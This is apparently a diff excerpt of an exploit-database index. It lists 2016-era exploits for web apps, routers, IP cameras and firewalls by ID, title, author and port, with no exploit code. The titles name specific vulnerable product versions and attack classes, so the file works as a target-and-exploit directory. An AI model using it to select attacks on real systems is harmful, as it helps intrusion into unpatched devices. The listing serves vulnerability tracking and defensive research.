+39871,exploits/cgi/webapps/39871.txt,"AirOS NanoStation M2 5.6-beta - Multiple Vulnerabilities",2016-05-31,"Pablo Rebolini",webapps,cgi,80 +40464,exploits/cgi/webapps/40464.txt,"Cisco Firepower Threat Management Console 6.0.1 - Local File Inclusion",2016-10-05,KoreLogic,webapps,cgi, +39872,exploits/php/webapps/39872.txt,"ProcessMaker 3.0.1.7 - Multiple Vulnerabilities",2016-05-31,"Mickael Dorigny",webapps,php,80 +39876,exploits/php/webapps/39876.txt,"AjaxExplorer 1.10.3.2 - Multiple Vulnerabilities",2016-06-01,hyp3rlinx,webapps,php,80 +39965,exploits/php/webapps/39965.txt,"Tiki Wiki CMS Calendar 6.15/9.11 LTS/12.5 LTS/14.2 - Remote Code Execution",2016-06-16,"Dany Ouellet",webapps,php,80 +39879,exploits/php/webapps/39879.txt,"Joomla! Component SecurityCheck 2.8.9 - Multiple Vulnerabilities",2016-06-02,"ADEO Security",webapps,php,80 +39880,exploits/jsp/webapps/39880.txt,"Liferay CE < 6.2 CE GA6 - Persistent Cross-Site Scripting",2016-06-02,"Fernando Câmara",webapps,jsp, +39881,exploits/php/webapps/39881.txt,"Relay Ajax Directory Manager relayb01-071706/1.5.1/1.5.3 - Unauthenticated Arbitrary File Upload",2016-06-02,"RedTeam Pentesting GmbH",webapps,php,80 +40463,exploits/cgi/webapps/40463.txt,"Cisco Firepower Threat Management Console 6.0.1 - Remote Command Execution",2016-10-05,KoreLogic,webapps,cgi, +39884,exploits/php/webapps/39884.html,"Dream Gallery 1.0 - Cross-Site Request Forgery (Add Admin)",2016-06-06,"Ali Ghanbari",webapps,php,80 +39886,exploits/java/webapps/39886.txt,"Apache Continuum 1.4.2 - Multiple Vulnerabilities",2016-06-06,"David Shanahan",webapps,java, +39887,exploits/cgi/webapps/39887.txt,"Sun Secure Global Desktop and Oracle Global Desktop 4.61.915 - Command Injection (Shellshock)",2016-06-06,lastc0de,webapps,cgi,80 +39889,exploits/php/webapps/39889.html,"ArticleSetup 1.00 - Cross-Site Request Forgery (Change Admin Password)",2016-06-06,"Ali Ghanbari",webapps,php,80 +39890,exploits/php/webapps/39890.txt,"Electroweb Online Examination System 1.0 - SQL Injection",2016-06-06,"Ali Ghanbari",webapps,php,80 +39891,exploits/php/webapps/39891.txt,"WordPress Plugin WP Mobile Detector 3.5 - Arbitrary File Upload",2016-06-06,"Aaditya Purani",webapps,php,80 +39892,exploits/php/webapps/39892.php,"WordPress Theme Creative Multi-Purpose 9.1.3 - Persistent Cross-Site Scripting",2016-06-06,wp0Day.com,webapps,php,80 +39893,exploits/php/webapps/39893.php,"WordPress Plugin WP PRO Advertising System 4.6.18 - SQL Injection",2016-06-06,wp0Day.com,webapps,php,80 +39894,exploits/php/webapps/39894.php,"WordPress Theme Newspaper 6.7.1 - Privilege Escalation",2016-06-06,wp0Day.com,webapps,php,80 +39895,exploits/php/webapps/39895.php,"WordPress Theme Uncode 1.3.1 - Arbitrary File Upload",2016-06-06,wp0Day.com,webapps,php,80 +39896,exploits/php/webapps/39896.txt,"WordPress Plugin Double Opt-In for Download 2.0.9 - SQL Injection",2016-06-06,"Kacper Szurek",webapps,php,80 +39897,exploits/asp/webapps/39897.txt,"Notilus Travel Solution Software 2012 R3 - SQL Injection",2016-06-06,"Alex Haynes",webapps,asp,80 +39898,exploits/php/webapps/39898.txt,"rConfig 3.1.1 - Local File Inclusion",2016-06-06,"Gregory Pickett",webapps,php,80 +39899,exploits/php/webapps/39899.txt,"Nagios XI 5.2.7 - Multiple Vulnerabilities",2016-06-06,Security-Assessment.com,webapps,php,80 +39904,exploits/asp/webapps/39904.txt,"Cisco EPC 3928 - Multiple Vulnerabilities",2016-06-07,"Patryk Bogdan",webapps,asp, +39905,exploits/php/webapps/39905.txt,"Drale DBTableViewer 100123 - Blind SQL Injection",2016-06-08,HaHwul,webapps,php,80 +39909,exploits/xml/webapps/39909.rb,"Dell OpenManage Server Administrator 8.3 - XML External Entity",2016-06-10,hantwister,webapps,xml, +40047,exploits/php/webapps/40047.txt,"Phoenix Exploit Kit - Remote Code Execution",2016-07-01,CrashBandicot,webapps,php,80 +39911,exploits/php/webapps/39911.html,"Mobiketa 1.0 - Cross-Site Request Forgery (Add Admin)",2016-06-10,"Murat Yilmazlar",webapps,php,80 +39912,exploits/php/webapps/39912.html,"miniMySQLAdmin 1.1.3 - Cross-Site Request Forgery (SQL Execution)",2016-06-10,HaHwul,webapps,php,80 +39913,exploits/php/webapps/39913.txt,"phpMyFAQ 2.9.0 - Persistent Cross-Site Scripting",2016-06-10,"Kacper Szurek",webapps,php,80 +39931,exploits/php/webapps/39931.txt,"FRticket Ticket System - Persistent Cross-Site Scripting",2016-06-13,"Hamit Abis",webapps,php,80 +39932,exploits/php/webapps/39932.html,"Viart Shopping Cart 5.0 - Cross-Site Request Forgery / Arbitrary File Upload",2016-06-13,"Ali Ghanbari",webapps,php,80 +39934,exploits/php/webapps/39934.txt,"Dream Gallery 2.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",webapps,php,80 +39935,exploits/php/webapps/39935.txt,"Grid Gallery 1.0 - Admin Panel Authentication Bypass",2016-06-13,"Ali BawazeEer",webapps,php,80 +39936,exploits/php/webapps/39936.txt,"Joomla! Component com_payplans 3.3.6 - SQL Injection",2016-06-13,"Persian Hack Team",webapps,php,80 +39937,exploits/php/webapps/39937.py,"Zabbix 2.2 < 3.0.3 - API JSON-RPC Remote Code Execution",2016-06-13,"Alexander Gurin",webapps,php,80 +39946,exploits/php/webapps/39946.php,"WordPress Plugin Social Stream 1.5.15 - wp_options Overwrite",2016-06-14,wp0Day.com,webapps,php,80 +39948,exploits/php/webapps/39948.txt,"Ultrabenosaurus ChatBoard - Persistent Cross-Site Scripting",2016-06-15,HaHwul,webapps,php,80 +39949,exploits/php/webapps/39949.html,"Ultrabenosaurus ChatBoard - Cross-Site Request Forgery (Send Message)",2016-06-15,HaHwul,webapps,php,80 +39950,exploits/php/webapps/39950.txt,"w2wiki - Multiple Cross-Site Scripting Vulnerabilities",2016-06-15,HaHwul,webapps,php,80 +39951,exploits/hardware/webapps/39951.txt,"Hyperoptic (Tilgin) Router HG23xx - Multiple Vulnerabilities",2016-06-15,LiquidWorm,webapps,hardware,80 +39952,exploits/php/webapps/39952.txt,"Dokeos 2.2.1 - Blind SQL Injection",2016-06-15,Mormoroth,webapps,php,80 +39953,exploits/php/webapps/39953.txt,"Joomla! Component com_enmasse 5.1 < 6.4 - SQL Injection",2016-06-15,"Hamed Izadi",webapps,php,80 +39955,exploits/php/webapps/39955.txt,"BookingWizz Booking System < 5.5 - Multiple Vulnerabilities",2016-06-15,"Mehmet Ince",webapps,php,80 +39956,exploits/php/webapps/39956.txt,"jbFileManager - Directory Traversal",2016-06-15,HaHwul,webapps,php,80 +39957,exploits/php/webapps/39957.py,"PHPLive 4.4.8 < 4.5.4 - Password Recovery SQL Injection",2016-06-15,"Tiago Carvalho",webapps,php,80 +39962,exploits/hardware/webapps/39962.txt,"ATCOM PBX IP01 / IP08 / IP4 / IP2G4A - Authentication Bypass",2016-06-16,i-Hmx,webapps,hardware,80 +39963,exploits/php/webapps/39963.txt,"Roxy Fileman 1.4.4 - Arbitrary File Upload",2016-06-16,"Tyrell Sassen",webapps,php,80 +39964,exploits/php/webapps/39964.html,"SlimCMS 0.1 - Cross-Site Request Forgery (Change Admin Password)",2016-06-16,"Avinash Thapa",webapps,php,80 +39969,exploits/php/webapps/39969.php,"WordPress Plugin Gravity Forms 1.8.19 - Arbitrary File Upload",2016-06-17,"Abk Khan",webapps,php,80 +39970,exploits/php/webapps/39970.txt,"Vicidial 2.11 - Scripts Persistent Cross-Site Scripting",2016-06-17,"David Silveiro",webapps,php,80 +39971,exploits/php/webapps/39971.php,"phpATM 1.32 (Windows) - Arbitrary File Upload / Remote Command Execution",2016-06-17,"Paolo Massenio",webapps,php,80 +39972,exploits/php/webapps/39972.txt,"phpATM 1.32 - Multiple Vulnerabilities",2016-06-17,"Paolo Massenio",webapps,php,80 +39974,exploits/php/webapps/39974.html,"WordPress Plugin Ultimate Product Catalog 3.8.1 - Privilege Escalation",2016-06-20,"i0akiN SEC-LABORATORY",webapps,php,80 +39976,exploits/php/webapps/39976.txt,"sNews CMS 1.7.1 - Multiple Vulnerabilities",2016-06-20,hyp3rlinx,webapps,php,80 +39977,exploits/php/webapps/39977.txt,"Joomla! Component com_bt_media 1.0 - SQL Injection",2016-06-20,"Persian Hack Team",webapps,php,80 +39978,exploits/php/webapps/39978.php,"WordPress Plugin Premium SEO Pack 1.9.1.3 - wp_options Overwrite",2016-06-20,wp0Day.com,webapps,php,80 +39981,exploits/php/webapps/39981.html,"Airia - Cross-Site Request Forgery (Add Content)",2016-06-20,HaHwul,webapps,php,80 +39982,exploits/php/webapps/39982.rb,"Airia - Arbitrary File Upload",2016-06-20,HaHwul,webapps,php,80 +39983,exploits/php/webapps/39983.txt,"Symphony CMS 2.6.7 - Session Fixation",2016-06-20,hyp3rlinx,webapps,php,80 +39987,exploits/php/webapps/39987.html,"IonizeCMS 1.0.8 - Cross-Site Request Forgery (Add Admin)",2016-06-21,s0nk3y,webapps,php,80 +39988,exploits/php/webapps/39988.html,"Yona CMS - Cross-Site Request Forgery",2016-06-21,s0nk3y,webapps,php,80 +39989,exploits/php/webapps/39989.txt,"Joomla! Component com_publisher - SQL Injection",2016-06-21,s0nk3y,webapps,php,80 +39995,exploits/java/webapps/39995.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - 'ctcprotocol Servlet' XML External Entity",2016-06-21,ERPScan,webapps,java, +39996,exploits/java/webapps/39996.txt,"SAP NetWeaver AS JAVA 7.1 < 7.5 - Directory Traversal",2016-06-21,ERPScan,webapps,java, +39997,exploits/ruby/webapps/39997.txt,"Radiant CMS 1.1.3 - Multiple Persistent Cross-Site Scripting Vulnerabilities",2016-06-21,"David Silveiro",webapps,ruby,80 +39998,exploits/php/webapps/39998.txt,"YetiForce CRM < 3.1 - Persistent Cross-Site Scripting",2016-06-21,"David Silveiro",webapps,php,80 +40111,exploits/php/webapps/40111.txt,"Joomla! Component Guru Pro - SQL Injection",2016-07-14,s0nk3y,webapps,php,80 +40006,exploits/php/webapps/40006.txt,"Alibaba Clone B2B Script - Arbitrary File Disclosure",2016-06-23,"Meisam Monsef",webapps,php,80 +40009,exploits/php/webapps/40009.txt,"XuezhuLi FileSharing - Directory Traversal",2016-06-23,HaHwul,webapps,php,80 +40010,exploits/php/webapps/40010.html,"XuezhuLi FileSharing - Cross-Site Request Forgery (Add User)",2016-06-23,HaHwul,webapps,php,80 +40011,exploits/php/webapps/40011.txt,"FinderView - Multiple Vulnerabilities",2016-06-23,HaHwul,webapps,php,80 +40012,exploits/php/webapps/40012.txt,"WordPress Plugin Ultimate Product Catalog 3.8.6 - Arbitrary File Upload",2016-06-27,"i0akiN SEC-LABORATORY",webapps,php,80 +40013,exploits/php/webapps/40013.txt,"OPAC KpwinSQL - SQL Injection",2016-06-27,bRpsd,webapps,php,80 +40015,exploits/php/webapps/40015.txt,"CodoForum 3.4 - Persistent Cross-Site Scripting",2016-06-27,"Ahmed Sherif",webapps,php,80 +40016,exploits/hardware/webapps/40016.txt,"Option CloudGate CG0192-11897 - Multiple Vulnerabilities",2016-06-27,LiquidWorm,webapps,hardware,80 +40332,exploits/hardware/webapps/40332.py,"Belkin F9K1122v1 1.00.30 - Buffer Overflow (via Cross-Site Request Forgery)",2016-09-04,b1ack0wl,webapps,hardware, +40019,exploits/php/webapps/40019.txt,"Kagao 3.0 - Multiple Vulnerabilities",2016-06-27,N4TuraL,webapps,php,80 +40021,exploits/php/webapps/40021.php,"My Little Forum 2.3.5 - PHP Command Injection",2016-06-27,hyp3rlinx,webapps,php,80 +40022,exploits/php/webapps/40022.txt,"iBilling 3.7.0 - Persistent Cross-Site Scripting / Reflected Cross-Site Scripting",2016-06-27,"Bikramaditya Guha",webapps,php,80 +40024,exploits/php/webapps/40024.txt,"BigTree CMS 4.2.11 - SQL Injection",2016-06-27,"Mehmet Ince",webapps,php,80 +40027,exploits/php/webapps/40027.txt,"SugarCRM 6.5.18 - PHP Code Injection",2016-06-27,"Egidio Romano",webapps,php,80 +40028,exploits/php/webapps/40028.txt,"Riverbed SteelCentral NetProfiler & NetExpress 10.8.7 - Multiple Vulnerabilities",2016-06-27,Security-Assessment.com,webapps,php,443 +40030,exploits/json/webapps/40030.py,"Untangle NGFW 12.1.0 Beta - 'execEvil()' Command Injection",2016-06-28,"Matt Bush",webapps,json,80 +40041,exploits/php/webapps/40041.txt,"Symantec Endpoint Protection Manager 12.1 - Multiple Vulnerabilities",2016-06-29,hyp3rlinx,webapps,php,8445 +40042,exploits/php/webapps/40042.php,"WordPress Plugin Ultimate Membership Pro 3.3 - SQL Injection",2016-06-29,wp0Day.com,webapps,php,80 +40044,exploits/cgi/webapps/40044.html,"Ubiquiti Administration Portal - Remote Command Execution (via Cross-Site Request Forgery)",2016-06-29,KoreLogic,webapps,cgi,443 +40045,exploits/php/webapps/40045.txt,"Concrete5 CMS 5.7.3.1 - 'Application::dispatch' Method Local File Inclusion",2016-06-29,"Egidio Romano",webapps,php,80 +40092,exploits/php/webapps/40092.txt,"Beauty Parlour & SPA Saloon Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",webapps,php,80 +40093,exploits/php/webapps/40093.txt,"Clinic Management System - Blind SQL Injection",2016-07-11,"Yakir Wizman",webapps,php,80 +40050,exploits/jsp/webapps/40050.txt,"XpoLog Center 6 - Remote Command Execution / Cross-Site Request Forgery",2016-07-04,LiquidWorm,webapps,jsp,30303 +40051,exploits/php/webapps/40051.txt,"Ktools Photostore 4.7.5 - Multiple Vulnerabilities",2016-07-04,"Yakir Wizman",webapps,php,80 +40055,exploits/php/webapps/40055.py,"WordPress Plugin Real3D FlipBook - Multiple Vulnerabilities",2016-07-04,"Mukarram Khalid",webapps,php,80 +40057,exploits/php/webapps/40057.txt,"WebCalendar 1.2.7 - Multiple Vulnerabilities",2016-07-04,hyp3rlinx,webapps,php,80 +40058,exploits/php/webapps/40058.txt,"eCardMAX 10.5 - Multiple Vulnerabilities",2016-07-04,"Bikramaditya Guha",webapps,php,80 +40060,exploits/jsp/webapps/40060.txt,"24online SMS_2500i 8.3.6 build 9.0 - SQL Injection",2016-07-06,"Rahul Raz",webapps,jsp,80 +40062,exploits/php/webapps/40062.txt,"Advanced Webhost Billing System (AWBS) 2.9.6 - Multiple Vulnerabilities",2016-07-06,"Bikramaditya Guha",webapps,php,80 +40063,exploits/cgi/webapps/40063.txt,"PaKnPost Pro 1.14 - Multiple Vulnerabilities",2016-07-06,"Edvin Rustemagic_ Grega Preseren",webapps,cgi,80 +40065,exploits/jsp/webapps/40065.txt,"OpenFire 3.10.2 < 4.0.1 - Multiple Vulnerabilities",2016-07-06,Sysdream,webapps,jsp,80 +40068,exploits/php/webapps/40068.txt,"OPAC KpwinSQL - Multiple Vulnerabilities",2016-07-07,"Yakir Wizman",webapps,php,80 +40070,exploits/php/webapps/40070.txt,"WordPress Plugin Lazy Content Slider 3.4 - Cross-Site Request Forgery (Add Catetory)",2016-07-08,"Persian Hack Team",webapps,php,80 +40076,exploits/php/webapps/40076.php,"PHP Real Estate Script 3 - Arbitrary File Disclosure",2016-07-08,"Meisam Monsef",webapps,php,80 +40077,exploits/xml/webapps/40077.txt,"CyberPower Systems PowerPanel 3.1.2 - Unauthenticated XML External Entity Out-Of-Band Data Retrieval",2016-07-08,LiquidWorm,webapps,xml,3052 +40078,exploits/php/webapps/40078.txt,"Streamo Online Radio And TV Streaming CMS - SQL Injection",2016-07-08,N4TuraL,webapps,php,80 +40106,exploits/windows/webapps/40106.txt,"GSX Analyzer 10.12/11 - 'main.swf' Hard-Coded Superadmin Credentials",2016-07-13,ndevnull,webapps,windows, +40109,exploits/xml/webapps/40109.txt,"Apache Archiva 1.3.9 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-07-13,"Julien Ahrens",webapps,xml, +40112,exploits/cgi/webapps/40112.txt,"Clear Voyager Hotspot IMW-C910W - Arbitrary File Disclosure",2016-07-15,Damaster,webapps,cgi,80 +40114,exploits/php/webapps/40114.py,"vBulletin 4.x/5.x - AdminCP/ApiLog via xmlrpc API Authenticated Persistent Cross-Site Scripting",2014-10-12,tintinweb,webapps,php, +40115,exploits/php/webapps/40115.py,"vBulletin 4.x - breadcrumbs via xmlrpc API Authenticated SQL Injection",2014-10-12,tintinweb,webapps,php, +40193,exploits/php/webapps/40193.txt,"Open Upload 0.4.2 - Cross-Site Request Forgery (Add Admin)",2016-08-02,"Vinesh Redkar",webapps,php,80 +40171,exploits/linux/webapps/40171.txt,"AXIS (Multiple Products) - 'devtools ' Authenticated Remote Command Execution",2016-07-29,Orwelllabs,webapps,linux,80 +40126,exploits/php/webapps/40126.txt,"NewsP Free News Script 1.4.7 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",webapps,php,80 +40127,exploits/php/webapps/40127.txt,"newsp.eu PHP Calendar Script 1.0 - User Credentials Disclosure",2016-07-19,"Meisam Monsef",webapps,php,80 +40129,exploits/python/webapps/40129.txt,"Django CMS 3.3.0 - Editor Snippet Persistent Cross-Site Scripting",2016-07-20,Vulnerability-Lab,webapps,python,80 +40133,exploits/multiple/webapps/40133.html,"Wowza Streaming Engine 4.5.0 - Remote Privilege Escalation",2016-07-20,LiquidWorm,webapps,multiple,8088 +40134,exploits/multiple/webapps/40134.html,"Wowza Streaming Engine 4.5.0 - Cross-Site Request Forgery (Add Advanced Admin)",2016-07-20,LiquidWorm,webapps,multiple,8088 +40135,exploits/multiple/webapps/40135.txt,"Wowza Streaming Engine 4.5.0 - Multiple Cross-Site Scripting Vulnerabilities",2016-07-20,LiquidWorm,webapps,multiple,8088 +40137,exploits/php/webapps/40137.html,"WordPress Plugin Video Player 1.5.16 - SQL Injection",2016-07-20,"David Vaartjes",webapps,php,80 +40140,exploits/php/webapps/40140.txt,"TeamPass Passwords Management System 2.1.26 - Arbitrary File Download",2016-07-21,"Hasan Emre Ozer",webapps,php,80 +40149,exploits/php/webapps/40149.rb,"Drupal Module CODER 2.5 - Remote Command Execution (Metasploit)",2016-07-25,"Mehmet Ince",webapps,php,80 +40150,exploits/php/webapps/40150.txt,"CodoForum 3.2.1 - SQL Injection",2016-07-25,"Yakir Wizman",webapps,php,80 +40153,exploits/php/webapps/40153.txt,"GRR Système de Gestion et de Réservations de Ressources 3.0.0-RC1 - Arbitrary File Upload",2016-07-25,kmkz,webapps,php,80 +40154,exploits/php/webapps/40154.txt,"PHP gettext 1.0.12 - 'gettext.php' Unauthenticated Code Execution",2016-07-25,kmkz,webapps,php, +40156,exploits/cgi/webapps/40156.py,"Ubee EVW3226 Modem/Router 1.0.20 - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",webapps,cgi,80 +40157,exploits/cgi/webapps/40157.py,"Technicolor TC7200 Modem/Router STD6.02.11 - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",webapps,cgi,80 +40158,exploits/hardware/webapps/40158.txt,"Hitron CGNV4 Modem/Router 4.3.9.9-SIP-UPC - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",webapps,hardware,80 +40159,exploits/hardware/webapps/40159.txt,"Compal CH7465LG-LC Modem/Router CH7465LG-NCIP-4.50.18.13-NOSH - Multiple Vulnerabilities",2016-07-25,"Gergely Eberhardt",webapps,hardware,80 +40160,exploits/hardware/webapps/40160.py,"Bellini/Supercook Wi-Fi Yumi SC200 - Multiple Vulnerabilities",2016-07-25,"James McLean",webapps,hardware, +40161,exploits/java/webapps/40161.txt,"Micro Focus Filr 2 2.0.0.421/1.2 1.2.0.846 - Multiple Vulnerabilities",2016-07-25,"SEC Consult",webapps,java,9443 +40163,exploits/php/webapps/40163.txt,"PHP File Vault 0.9 - Directory Traversal",2016-07-26,N_A,webapps,php,80 +40165,exploits/cgi/webapps/40165.txt,"Iris ID IrisAccess ICU 7000-2 - Multiple Vulnerabilities",2016-07-26,LiquidWorm,webapps,cgi,80 +40166,exploits/cgi/webapps/40166.txt,"Iris ID IrisAccess ICU 7000-2 - Remote Command Execution",2016-07-26,LiquidWorm,webapps,cgi,80 +40174,exploits/php/webapps/40174.txt,"WordPress Plugin Ultimate Product Catalog 3.9.8 - do_shortcode via ajax Blind SQL Injection",2016-07-29,"i0akiN SEC-LABORATORY",webapps,php,80 +40180,exploits/linux/webapps/40180.txt,"Trend Micro Deep Discovery 3.7/3.8 SP1 (3.81)/3.8 SP2 (3.82) - 'hotfix_upload.cgi' Filename Remote Code Execution",2016-07-29,korpritzombie,webapps,linux,443 +40185,exploits/php/webapps/40185.py,"phpMyAdmin 4.6.2 - Authenticated Remote Code Execution",2016-07-29,@iamsecurity,webapps,php,80 +40189,exploits/php/webapps/40189.txt,"WordPress Plugin Booking Calendar 6.2 - SQL Injection",2016-08-01,"Edwin Molenaar",webapps,php,80 +40190,exploits/php/webapps/40190.txt,"WordPress Plugin WP Live Chat Support 6.2.03 - Persistent Cross-Site Scripting",2016-08-01,"Dennis Kerdijk & Erwin Kievith",webapps,php,80 +40191,exploits/php/webapps/40191.txt,"WordPress Plugin ALO EasyMail NewsLetter 2.9.2 - Cross-Site Request Forgery (Add/Import Arbitrary Subscribers)",2016-08-01,"Yorick Koster",webapps,php,80 +40202,exploits/php/webapps/40202.txt,"Subrion CMS 4.0.5 - SQL Injection",2016-08-05,Vulnerability-Lab,webapps,php,80 +40204,exploits/php/webapps/40204.txt,"PHP Power Browse 1.2 - Directory Traversal",2016-08-05,"Manuel Mancera",webapps,php,80 +40205,exploits/cgi/webapps/40205.txt,"Davolink DV-2051 - Multiple Vulnerabilities",2016-08-05,"Eric Flokstra",webapps,cgi,80 +40206,exploits/php/webapps/40206.txt,"WordPress Plugin Count Per Day 3.5.4 - Persistent Cross-Site Scripting",2016-08-05,"Julien Rentrop",webapps,php,80 +40207,exploits/hardware/webapps/40207.txt,"NASdeluxe NDL-2400r 2.01.09 - OS Command Injection",2016-08-05,"SySS GmbH",webapps,hardware,80 +40209,exploits/php/webapps/40209.py,"NUUO NVRmini 2 3.0.8 - Remote Code Execution",2016-08-06,LiquidWorm,webapps,php,80 +40210,exploits/php/webapps/40210.html,"NUUO NVRmini 2 3.0.8 - Cross-Site Request Forgery (Add Admin)",2016-08-06,LiquidWorm,webapps,php,80 +40211,exploits/php/webapps/40211.txt,"NUUO NVRmini 2 3.0.8 - Local File Disclosure",2016-08-06,LiquidWorm,webapps,php,80 +40212,exploits/php/webapps/40212.txt,"NUUO NVRmini 2 3.0.8 - Multiple OS Command Injections",2016-08-06,LiquidWorm,webapps,php,80 +40213,exploits/cgi/webapps/40213.txt,"NUUO NVRmini 2 3.0.8 - Remote Command Injection (Shellshock)",2016-08-06,LiquidWorm,webapps,cgi,80 +40214,exploits/php/webapps/40214.txt,"NUUO NVRmini 2 3.0.8 - Arbitrary File Deletion",2016-08-06,LiquidWorm,webapps,php,80 +40215,exploits/php/webapps/40215.txt,"NUUO NVRmini 2 3.0.8 - 'strong_user.php' Backdoor Remote Shell Access",2016-08-06,LiquidWorm,webapps,php,80 +40216,exploits/jsp/webapps/40216.txt,"Navis Webaccess - SQL Injection",2016-08-08,bRpsd,webapps,jsp,9000 +40218,exploits/php/webapps/40218.txt,"PHPCollab CMS 2.5 - 'emailusers.php' SQL Injection",2016-08-08,Vulnerability-Lab,webapps,php,80 +40220,exploits/php/webapps/40220.txt,"WordPress Plugin Add From Server < 3.3.2 - Cross-Site Request Forgery (Arbitrary File Upload)",2016-08-08,"Edwin Molenaar",webapps,php,80 +40221,exploits/php/webapps/40221.txt,"Nagios Network Analyzer 2.2.1 - Multiple Cross-Site Request Forgery Vulnerabilities",2016-08-10,hyp3rlinx,webapps,php,80 +40225,exploits/php/webapps/40225.py,"vBulletin 5.2.2 - Unauthenticated Server-Side Request Forgery",2016-08-10,"Dawid Golunski",webapps,php,80 +40227,exploits/php/webapps/40227.txt,"EyeLock nano NXT 3.5 - Local File Disclosure",2016-08-10,LiquidWorm,webapps,php,80 +40228,exploits/php/webapps/40228.py,"EyeLock nano NXT 3.5 - Remote Code Execution",2016-08-10,LiquidWorm,webapps,php,80 +40229,exploits/jsp/webapps/40229.txt,"WebNMS Framework Server 5.2/5.2 SP1 - Multiple Vulnerabilities",2016-08-10,"Pedro Ribeiro",webapps,jsp, +40231,exploits/java/webapps/40231.txt,"ColoradoFTP 1.3 Prime Edition (Build 8) - Directory Traversal",2016-08-11,Rv3Laboratory,webapps,java,80 +40281,exploits/cgi/webapps/40281.txt,"Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR - Local File Disclosure",2016-08-22,"Yakir Wizman",webapps,cgi, +40236,exploits/ruby/webapps/40236.txt,"GitLab - 'impersonate' Feature Privilege Escalation",2016-08-15,Kaimi,webapps,ruby,80 +40262,exploits/cgi/webapps/40262.txt,"SIEMENS IP Cameras (Multiple Models) - Credential Disclosure / Configuration Download",2016-08-19,"Todor Donev",webapps,cgi,80 +40237,exploits/php/webapps/40237.txt,"Zabbix 2.2.x/3.0.x - SQL Injection",2016-08-15,1n3,webapps,php, +40239,exploits/jsp/webapps/40239.txt,"WSO2 Identity Server 5.1.0 - Multiple Vulnerabilities",2016-08-16,hyp3rlinx,webapps,jsp, +40240,exploits/jsp/webapps/40240.txt,"WSO2 Carbon 4.4.5 - Local File Inclusion",2016-08-16,hyp3rlinx,webapps,jsp,9443 +40241,exploits/jsp/webapps/40241.txt,"WSO2 Carbon 4.4.5 - Persistent Cross-Site Scripting",2016-08-16,hyp3rlinx,webapps,jsp,9443 +40242,exploits/jsp/webapps/40242.txt,"WSO2 Carbon 4.4.5 - Denial of Service / Cross-Site Request Forgery",2016-08-16,hyp3rlinx,webapps,jsp,9443 +40247,exploits/php/webapps/40247.txt,"Lepton CMS 2.2.0/2.2.1 - Directory Traversal",2016-08-16,hyp3rlinx,webapps,php,80 +40248,exploits/php/webapps/40248.txt,"Lepton CMS 2.2.0/2.2.1 - PHP Code Injection",2016-08-16,hyp3rlinx,webapps,php,80 +40249,exploits/linux/webapps/40249.txt,"Pi-Hole Web Interface 2.8.1 - Persistent Cross-Site Scripting in Whitelist/Blacklist",2016-08-16,loneferret,webapps,linux, +40250,exploits/php/webapps/40250.txt,"Nagios Log Server 1.4.1 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,webapps,php, +40251,exploits/php/webapps/40251.txt,"Nagios Network Analyzer 2.2.0 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,webapps,php, +40252,exploits/php/webapps/40252.txt,"Nagios Incident Manager 2.0.0 - Multiple Vulnerabilities",2016-08-16,Security-Assessment.com,webapps,php, +40254,exploits/cgi/webapps/40254.txt,"SIEMENS IP-Camera CVMS2025-IR / CCMS2025 - Credentials Disclosure",2016-08-17,"Yakir Wizman",webapps,cgi,80 +40260,exploits/cgi/webapps/40260.sh,"SIEMENS IP Camera CCMW1025 x.2.2.1798 - Remote Admin Credentials Change",2016-08-18,"Todor Donev",webapps,cgi,80 +40261,exploits/cgi/webapps/40261.txt,"Honeywell IP-Camera HICC-1100PT - Credentials Disclosure",2016-08-18,"Yakir Wizman",webapps,cgi,80 +40263,exploits/cgi/webapps/40263.txt,"Vanderbilt IP-Camera CCPW3025-IR / CVMW3025-IR - Credentials Disclosure",2016-08-19,"Yakir Wizman",webapps,cgi,80 +40264,exploits/cgi/webapps/40264.txt,"JVC IP-Camera VN-T216VPRU - Credentials Disclosure",2016-08-19,"Yakir Wizman",webapps,cgi,80 +40265,exploits/cgi/webapps/40265.txt,"C2S DVR Management IRDOME-II-C2S / IRBOX-II-C2S / DVR - Credentials Disclosure / Authentication Bypass",2016-08-19,"Yakir Wizman",webapps,cgi,80 +40266,exploits/cgi/webapps/40266.txt,"TOSHIBA IP-Camera IK-WP41A - Authentication Bypass / Configuration Download",2016-08-19,"Todor Donev",webapps,cgi,80 +40267,exploits/cgi/webapps/40267.txt,"MESSOA IP-Camera NIC990 - Authentication Bypass / Configuration Download",2016-08-19,"Todor Donev",webapps,cgi,80 +40269,exploits/cgi/webapps/40269.txt,"ZYCOO IP Phone System - Remote Command Execution",2016-08-19,0x4148,webapps,cgi, +40272,exploits/cgi/webapps/40272.txt,"TOPSEC Firewalls - 'ELIGIBLECONTESTANT' Remote Code Execution",2016-08-19,"Shadow Brokers",webapps,cgi, +40273,exploits/cgi/webapps/40273.txt,"TOPSEC Firewalls - 'ELIGIBLECANDIDATE' Remote Code Execution",2016-08-19,"Shadow Brokers",webapps,cgi, +40274,exploits/cgi/webapps/40274.txt,"TOPSEC Firewalls - 'ELIGIBLEBOMBSHELL' Remote Code Execution",2016-08-19,"Shadow Brokers",webapps,cgi, +40276,exploits/hardware/webapps/40276.txt,"Fortigate Firewalls - 'EGREGIOUSBLUNDER' Remote Code Execution",2016-08-19,"Shadow Brokers",webapps,hardware, +40277,exploits/cgi/webapps/40277.sh,"MESSOA IP Cameras (Multiple Models) - Unauthenticated Password Change",2016-08-19,"Todor Donev",webapps,cgi,80 +40278,exploits/php/webapps/40278.txt,"tcPbX - 'tcpbx_lang' Local File Inclusion",2016-08-19,0x4148,webapps,php, +40282,exploits/cgi/webapps/40282.txt,"JVC IP-Camera VN-T216VPRU - Local File Disclosure",2016-08-22,"Yakir Wizman",webapps,cgi, +40283,exploits/cgi/webapps/40283.txt,"Honeywell IP-Camera HICC-1100PT - Local File Disclosure",2016-08-22,"Yakir Wizman",webapps,cgi, +40284,exploits/hardware/webapps/40284.txt,"VideoIQ Camera - Local File Disclosure",2016-08-22,"Yakir Wizman",webapps,hardware, 